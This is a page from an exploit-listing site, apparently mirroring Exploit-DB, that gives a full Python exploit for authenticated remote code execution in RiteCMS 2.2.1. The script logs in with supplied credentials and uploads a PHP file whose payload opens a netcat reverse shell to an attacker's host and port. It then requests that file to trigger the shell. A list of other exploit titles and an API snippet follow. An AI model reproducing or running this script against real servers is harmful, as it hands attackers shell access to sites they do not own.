To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"RiteCMS 2.2.1 - Remote Code Execution (Authenticated)"

Author

Exploit author

H0j3n

Platform

Exploit platform

php

Release date

Exploit published date

2020-10-20

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
# Date: 2020-07-03
# Exploit Author: H0j3n
# Vendor Homepage: http://ritecms.com/
# Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download
# Version: 2.2.1
# Tested on: Linux
# Reference: https://www.exploit-db.com/exploits/48636

# !/usr/bin/python
# coding=utf-8
import requests,sys,base64,os
from colorama import Fore, Back, Style
from requests_toolbelt.multipart.encoder import MultipartEncoder
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Variable
CONTENT = '''<form action="index.php" method="post">'''

# Header
def header():
	top = cyan('''
 \t _____  _ _        _____ __  __  _____ 
 \t|  __ \(_) |      / ____|  \/  |/ ____|
 \t| |__) |_| |_ ___| |    | \  / | (___              ___    ___   ___
 \t|  _  /| | __/ _ \ |    | |\/| |\___ \     _  __  |_  |  |_  | <  /
 \t| | \ \| | ||  __/ |____| |  | |____) |   | |/ / / __/_ / __/_ / / 
 \t|_|  \_\_|\__\___|\_____|_|  |_|_____/    |___/ /____(_)____(_)_/                                      
''')
    	return top 

def info():
	top = cyan('''
[+] IP : {0}
[+] USERNAME : {1}
[+] PASSWORD : {2}
'''.format(IP,USER,PASS))

	return top
    
# Request Function
# Color Function
def cyan(STRING):
    return Style.BRIGHT+Fore.CYAN+STRING+Fore.RESET
    
def red(STRING):
    return Style.BRIGHT+Fore.RED+STRING+Fore.RESET

    
# Main    	
if __name__ == "__main__":
	print header()
	print "\t--------------------------------------------------------------"
        print "\t|  RiteCMS v2.2.1 - Authenticated Remote Code Execution      |"
	print "\t--------------------------------------------------------------"
	print "\t| Reference : https://www.exploit-db.com/exploits/48636      |"
	print "\t| By        : H0j3n                                          |"
	print "\t--------------------------------------------------------------"
	if len(sys.argv) == 1:
		print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
		
		print cyan("\n[-] Please Put IP & Credentials")
		sys.exit(-1)
	if len(sys.argv) == 2:
		print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
		
		print cyan("\n[-] Please Put Credentials")
		sys.exit(-1)
	if len(sys.argv) > 3:
		print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
		
		print cyan("\n[-] Only 2 arguments needed please see the usage!")
		sys.exit(-1)	
	IP = sys.argv[1]
	USER,PASS = sys.argv[2].split(":")
	print info()

	URL='{0}/cms/index.php'.format(IP)
	URL_UPLOAD = URL + '?mode=filemanager&action=upload&directory=media'

	HEAD = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}
	LOG_INFO = {"username" : USER, "userpw" : PASS}
	try:
		with requests.Session() as SESSION:
		    SESSION.get(URL)
		    SESSION.post(URL, data=LOG_INFO, headers=HEAD,allow_redirects=False)
	except:
		print red("[-] Check the URL!")
		sys.exit(-1)		
	if CONTENT in str(SESSION.get(URL_UPLOAD).text):
		print red("[-] Cannot Login!")
		sys.exit(-1)	
	else:
		print cyan("[+] Credentials Working!")
	LHOST = str(raw_input("Enter LHOST : "))
	LPORT = str(raw_input("Enter LPORT : "))
	FILENAME = str(raw_input("Enter FileName (include.php) : "))
	PAYLOAD = "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f'); ?>".format(LHOST,LPORT)
	FORM_DATA = {
	    'mode': (None,'filemanager'),
	    'file': (FILENAME, PAYLOAD),
	    'directory': (None, 'media'),
	    'file_name': (None, ''),
	    'upload_mode': (None, '1'),
	    'resize_xy': (None, 'x'),
	    'resize': (None, '640'),
	    'compression': (None, '80'),
	    'thumbnail_resize_xy': (None, 'x'),
	    'thumbnail_resize': (None, '150'),
	    'thumbnail_compression': (None, '70'),
	    'upload_file_submit': (None, 'OK - Upload file')
	}
	HEADER_UPLOAD = {
	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
	'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
	'Accept-Language': 'en-US,en;q=0.5',
	'Accept-Encoding': 'gzip, deflate',
	'Referer': URL_UPLOAD
	}
	response = SESSION.post(URL,files=FORM_DATA,headers=HEADER_UPLOAD)
	if FILENAME in response.text:
		print cyan("\n[+] File uploaded and can be found!")
	else:
		print red("[-] File cannot be found or use different file name!")
		sys.exit(-1)
	URL_GET = IP + '/media/{0}'.format(FILENAME)
	OPTIONS = str(raw_input("Exploit Now (y/n)?"))
	print cyan("\nW0rk1ng!!! Enjoy :)")
	SESSION.get(URL_GET)
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-10-20 "RiteCMS 2.2.1 - Remote Code Execution (Authenticated)" webapps php H0j3n
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48915/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.